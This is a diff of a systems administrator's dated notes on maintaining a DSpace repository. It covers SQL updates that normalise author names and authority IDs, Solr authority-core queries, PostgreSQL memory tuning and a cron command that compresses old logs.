- Also, as always, I need to read Shawn Heisey’s wiki page on Solr
@@ -319,17 +319,17 @@ GC_TUNE="-XX:-UseSuperWord \
- Some author authority corrections and name standardizations for Peter:
-dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
+dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
UPDATE 11
-dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
+dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
UPDATE 36
-dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
+dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
UPDATE 14
-dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
+dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
UPDATE 42
-dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
+dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
UPDATE 360
-dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
UPDATE 561
- Pay attention to the regex to prevent false positives in tricky cases with Dutch names!
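To illustrate why the extra `!~ '^.*W\.?$'` condition matters, here is a small Python sketch of the same filter. The name variants are hypothetical examples rather than values from the database, and `should_rename` is an invented helper that mirrors the `LIKE '%an der Hoek%'` plus negated-regex condition of the third UPDATE.

```python
import re

# Same suffix check as the SQL: the value ends in "W" or "W."
ENDS_WITH_W = re.compile(r"^.*W\.?$")


def should_rename(text_value: str) -> bool:
    # Contains "an der Hoek" (covers "Van" and "van") and does not end in W / W.
    return "an der Hoek" in text_value and ENDS_WITH_W.search(text_value) is None


# Hypothetical name variants for illustration only.
candidates = [
    "Van der Hoek, R.",
    "van der Hoek, Rein",
    "Van der Hoek, W.",
    "van der Hoek, W",
]

for name in candidates:
    print(f"{name!r}: rename={should_rename(name)}")
```

Without the suffix check, a different author with the initial W would be renamed to "Hoek, Rein van der" along with the intended records.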
@@ -343,7 +343,7 @@ UPDATE 561
- The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn’t dedicated (also runs Solr, which can benefit from OS cache) so let’s try 1024MB
- In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):
-$ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
+$ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@@ -377,30 +377,30 @@ sys 0m22.647s
Querying that ID shows the fields that need to be changed:
{
- "responseHeader": {
- "status": 0,
- "QTime": 1,
- "params": {
- "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
- "indent": "true",
- "wt": "json",
- "_": "1481102189244"
+ "responseHeader": {
+ "status": 0,
+ "QTime": 1,
+ "params": {
+ "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
+ "indent": "true",
+ "wt": "json",
+ "_": "1481102189244"
}
},
- "response": {
- "numFound": 1,
- "start": 0,
- "docs": [
+ "response": {
+ "numFound": 1,
+ "start": 0,
+ "docs": [
{
- "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
- "field": "dc_contributor_author",
- "value": "Grace, D.",
- "deleted": false,
- "creation_date": "2016-11-10T15:13:40.318Z",
- "last_modified_date": "2016-11-10T15:13:40.318Z",
- "authority_type": "person",
- "first_name": "D.",
- "last_name": "Grace"
+ "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
+ "field": "dc_contributor_author",
+ "value": "Grace, D.",
+ "deleted": false,
+ "creation_date": "2016-11-10T15:13:40.318Z",
+ "last_modified_date": "2016-11-10T15:13:40.318Z",
+ "authority_type": "person",
+ "first_name": "D.",
+ "last_name": "Grace"
}
]
}
@@ -409,51 +409,51 @@ sys 0m22.647s
I think I can just update the `value`, `first_name`, and `last_name` fields…
The update syntax should be something like this, but I’m getting errors from Solr:
-$ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
+$ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
{
- "responseHeader":{
- "status":400,
- "QTime":0},
- "error":{
- "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
- "code":400}}
+ "responseHeader":{
+ "status":400,
+ "QTime":0},
+ "error":{
+ "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
+ "code":400}}
- When I try using the XML format I get an error that the `updateLog` needs to be configured for that core
- Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?
-dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
UPDATE 561
- Then I’ll reindex discovery and authority and see how the authority Solr core looks
- After this, now there are authorities for some of the “Grace, D.” and “Grace, Delia” text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):
-$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
+$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
{
- "responseHeader":{
- "status":0,
- "QTime":0,
- "params":{
- "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
- "indent":"true",
- "wt":"json"}},
- "response":{"numFound":1,"start":0,"docs":[
+ "responseHeader":{
+ "status":0,
+ "QTime":0,
+ "params":{
+ "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
+ "indent":"true",
+ "wt":"json"}},
+ "response":{"numFound":1,"start":0,"docs":[
{
- "id":"18ea1525-2513-430a-8817-a834cd733fbc",
- "field":"dc_contributor_author",
- "value":"Grace, Delia",
- "deleted":false,
- "creation_date":"2016-12-07T10:54:34.356Z",
- "last_modified_date":"2016-12-07T10:54:34.356Z",
- "authority_type":"person",
- "first_name":"Delia",
- "last_name":"Grace"}]
+ "id":"18ea1525-2513-430a-8817-a834cd733fbc",
+ "field":"dc_contributor_author",
+ "value":"Grace, Delia",
+ "deleted":false,
+ "creation_date":"2016-12-07T10:54:34.356Z",
+ "last_modified_date":"2016-12-07T10:54:34.356Z",
+ "authority_type":"person",
+ "first_name":"Delia",
+ "last_name":"Grace"}]
}}
- So now I could set them all to this ID and the name would be ok, but there has to be a better way!
- In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!
- Better to use:
-dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
- This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!
- Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID
@@ -461,17 +461,17 @@ UPDATE 561
- Deploy “take task” hack/fix on CGSpace (#290)
- I ran the following author corrections and then reindexed discovery:
-update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
-update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
-update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
-update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
-update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
-update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
+update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
+update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
+update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
+update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
+update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
2016-12-08
- Something weird happened and Peter Thorne’s names all ended up as “Thorne”, I guess because the original authority had that as its name value:
-dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
text_value | authority | confidence
------------------+--------------------------------------+------------
Thorne, P.J. | 18349f29-61b1-44d7-ac60-89e55546e812 | 600
@@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
- I generated a new UUID using
uuidgen | tr '[A-Z]' '[a-z]'
and set it along with correct name variation for all records:
-dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
+dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
UPDATE 43
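A minimal sketch of the UUID step, for reuse in later author corrections. The function name `new_authority_id` and the fallback to the Linux kernel's UUID source are assumptions for illustration, not part of the original notes. Quoting the `tr` character classes keeps the shell from expanding them as filename globs.

```shell
# Print one lowercase UUID suitable for use as an authority ID.
# Assumption: uuidgen (util-linux) is installed; otherwise fall back to
# the Linux kernel's random UUID source.
new_authority_id() {
    if command -v uuidgen >/dev/null 2>&1; then
        uuidgen | tr '[:upper:]' '[:lower:]'
    else
        tr '[:upper:]' '[:lower:]' < /proc/sys/kernel/random/uuid
    fi
}

new_authority_id
```

The printed value can then be pasted into the `authority='...'` clause of the update statement.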
- Apparently we also need to normalize Phil Thornton’s names to
Thornton, Philip K.
:
-dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
text_value | authority | confidence
---------------------+--------------------------------------+------------
Thornton, P | 0d8369bb-57f7-4b2f-92aa-af820b183aca | 600
@@ -506,7 +506,7 @@ UPDATE 43
- Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:
-dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
UPDATE 362
- It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)
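The ordering described above could be wrapped in a small helper so the two reindex steps always run in sequence. This is only a sketch: the function name and the `DSPACE_BIN` default path are placeholders, and it assumes the DSpace launcher provides the `index-authority` and `index-discovery` commands on this version.

```shell
# Assumption: DSPACE_BIN points at the DSpace launcher script; the default
# path below is a placeholder, not taken from the notes.
DSPACE_BIN="${DSPACE_BIN:-/path/to/dspace/bin/dspace}"

reindex_after_author_fix() {
    # Authority core first (PostgreSQL -> Solr authority core) ...
    "$DSPACE_BIN" index-authority || return 1
    # ... then Discovery (PostgreSQL -> Solr Discovery core).
    "$DSPACE_BIN" index-discovery
}
```

Stopping when the first step fails avoids rebuilding Discovery against a stale authority core.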
@@ -520,8 +520,8 @@ UPDATE 362
- Set PostgreSQL’s
shared_buffers
on CGSpace to 10% of system RAM (1200MB)
- Run the following author corrections on CGSpace:
-dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and (authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993');
-dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and (authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993');
+dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
- The authority IDs were different now than when I was looking a few days ago so I had to adjust them here
@@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
Removing the duplicates in OpenRefine and uploading a CSV to DSpace says “no changes detected”
Seems like the only way to sort of clean these up would be to start in SQL:
-dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
text_value | authority | confidence
-----------------------------------------------+--------------------------------------+------------
International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 | -1
@@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 600
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | -1
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 0
-dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
+dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
UPDATE 1693
-dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
+dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
UPDATE 35
- Work on article for KM4Dev journal
@@ -577,14 +577,14 @@ UPDATE 35
- So basically, new cron jobs for logs should look something like this:
- Find any file named
*.log*
that isn’t dspace.log*
, isn’t already zipped, and is older than one day, and zip it:
-# find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
+# find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
- Since there is
xzgrep
and xzless
we can actually just zip them after one day, why not?!
- We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that
- I use
schedtool -B
and ionice -c2 -n7
to set the CPU scheduling to SCHED_BATCH
and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less
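The two-week retention mentioned above is not shown as a command in these notes, so here is one way it might look. The function name `purge_old_logs`, the 14-day default and the `*.xz` pattern are assumptions for illustration, and `-delete` requires GNU or BSD `find`.

```shell
# Delete already-compressed logs once they are older than a retention window.
# Assumptions: GNU or BSD find (for -delete); the function name, the
# 14-day default and the *.xz pattern are illustrative only.
purge_old_logs() {
    log_dir=$1
    keep_days=${2:-14}
    # -mtime +N matches files whose age, rounded down to whole days,
    # is greater than N.
    find "$log_dir" -type f -name '*.xz' -mtime +"$keep_days" -print -delete
}
```

Calling `purge_old_logs /home/dspacetest.cgiar.org/log` would print each file it removes. Dropping `-delete` gives a dry run that only lists the candidates.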
- When the tasks are running you can see that the policies do apply:
-$ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
+